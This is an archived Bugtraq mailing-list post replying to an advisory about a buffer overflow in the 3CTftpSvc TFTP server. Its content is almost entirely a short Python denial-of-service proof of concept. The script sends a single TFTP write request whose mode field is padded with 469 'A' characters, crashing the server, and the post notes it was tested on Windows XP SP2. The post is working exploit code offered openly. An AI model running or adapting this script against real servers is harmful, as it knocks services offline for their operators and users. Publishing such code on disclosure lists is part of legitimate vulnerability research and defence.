lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201601100424.u0A4ONDQ023125@sf01web1.securityfocus.com>
Date: Sun, 10 Jan 2016 04:24:23 GMT
From: fgghy@...o.com
To: bugtraq@...urityfocus.com
Subject: Re: TFTP Server 3CTftpSvc Buffer Overflow Vulnerability (Long
 transporting mode)

 #!/usr/bin/python
 # Buffer Overflow (Long transporting mode) Vulnerability Exploit
 # This is just a DoS exploiting code
 # Tested on Windows xp SP2
 #
 # Requires python and impacket
 #
 # Coded by Liu Qixu Of NCNIPC

 import socket
 import sys

 host = '192.168.1.11'
 port = 69

 try:
 s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 except: 
 print "socket() failed" 
 sys.exit(1)

 filename = "A" 
 mode = "netascii" + "A" * 469
 da = "\x00\x02" + filename + "\0" + mode + "\0"
 s.sendto(da, (host, port))

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ